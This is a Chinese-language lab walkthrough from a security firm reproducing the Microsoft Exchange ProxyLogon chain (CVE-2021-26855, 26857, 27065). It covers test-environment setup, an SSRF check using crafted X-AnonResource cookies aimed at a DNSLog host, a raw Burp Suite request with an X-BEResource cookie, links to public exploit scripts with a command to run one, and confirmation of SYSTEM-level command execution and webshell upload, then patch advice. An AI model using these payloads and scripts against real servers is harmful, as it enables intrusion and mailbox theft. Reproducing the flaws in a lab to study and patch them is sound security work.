Exchange SSRF+RCE漏洞復現

0X00 簡介

Exchange Server是微軟公司的一套郵件服務組件，是個消息與協作系統，主要提供包括從電子郵件、會議安排、團體日程管理、任務管理、文檔管理、實時會議和工作流等協作應用。

0X01 漏洞概述

CVE-2021-26855該漏洞是Exchange中的服務端請求偽造漏洞（SSRF），利用此漏洞的攻擊者能夠發送任意HTTP請求並繞過Exchange Server身份驗證，遠程未授權的攻擊者可以利用該漏洞以進行內網探測，並可以用於竊取用戶郵箱的全部內容。

CVE-2021-26857是統一消息中的一個不安全的反序列化漏洞。不受信任的用戶可控數據被程序反序列的地方。利用此漏洞是HAFNIUM能夠在Exchange伺服器上以system身份運行代碼。

CVE-2021-27065是利用了Exchange伺服器不會對VirtualDirectory配置文件的文件後綴進行過濾，導致攻擊者可以通過惡意的URL在遠程伺服器上寫入Webshell並執行命令。

0X02 影響版本

0X03 環境搭建

1.在Windows server 2019上安裝AD域和DNS服務

2.安裝Exchange Server 2019

安裝.NET Framework 4.8

https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/0fd66638cde16859462a6243a4629a50/ndp48-x86-x64-allos-enu.exe

安裝Visual C++ 2013

https://support.microsoft.com/help/4032938/update-for-visual-c-2013-redistributable-package

安裝Unified Communications Managed API 4.0

https://www.microsoft.com/download/details.aspx?id=34992

以上軟體需安裝英文版

3.通過訪問https://localhost/ecp進入Exchange管理中心

實驗環境：關注公眾號上海矩安信息科技並回復CVE-2021-26855/27065/26857復現環境即可獲得

0X04 漏洞復現

一、利用CVE-2021-26855 SSRF

環境：

   本地伺服器：Windows Server 2019

   攻擊者：Kali

方法一：

1.訪問http://dnslog.cn/，點擊Get SubDomain獲取DNSLog地址。

訪問https://xx.xx.xx.xx/owa/auth/xxx.js(可以隨意構造)

2.構造cookie信息為：

X-AnonResource=true;X-AnonResource-Backend=DNSLOUG地址/ecp/default.flt?~3

3.如圖所示，可以返回連結地址，因此存在漏洞。

方法二：

1.通過Burp Suite工具的Repeater模塊對連結進行抓包，重新構造數據包。

POST /ecp/fewi.js HTTP/1.1 Host: mail.btwaf.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: X-BEResource=WIN-OP1S9J0GMEV/autodiscover/autodiscover.xml?a=~1942062522; Content-Type: text/xml Content-Length: 407 
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>test@abc.com</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover>
‍
2.更改用戶名和郵箱
二、利用CVE-2021-26857漏洞遠程執行命令
1.通過執行go腳本來獲取郵箱帳戶
go腳本地址：https://github.com/charlottelatest/CVE-2021-26855
2.執行EXP腳本獲取system權限，可以直接訪問網址，如報錯需修改腳本中的代理設置
EXP腳本地址：https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855 Exchange RCE/exp.py
3.執行系統命令whoami,返回nt authority\system說明可以返回當前用戶，可以遠程執行命令
三、CVE-2021-27065上傳Webshell執行遠程代碼
1.下載proxylogon腳本：https://github.com/hausec/ProxyLogon
執行腳本：python proxylogon.py xx.xx.xx.xx administrator@abc.com
2.獲取到system權限，可以執行系統命令
3.可以看到Windows Server目錄下有上傳的文件，說明可以傳輸惡意文件
0X05 漏洞防禦
微軟官方已經發布了解決上述漏洞的安全更新，建議受影響用戶儘快升級到安全版本，官方安全版本下載可以參考以下連結：
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855
由於傳播、利用此文所提供的信息而造成的任何直接或者間接的後果及損失，均由使用者本人負責，文章作者不為此承擔任何責任。上海矩安信息科技擁有對此文章的修改和解釋權。如需轉載或傳播此文章，必須保證此文章的完整性，包括版權聲明等全部內容。未經上海矩安信息科技允許，不得任意修改或者增減此文章內容，不得以任何方式將其用於商業目的。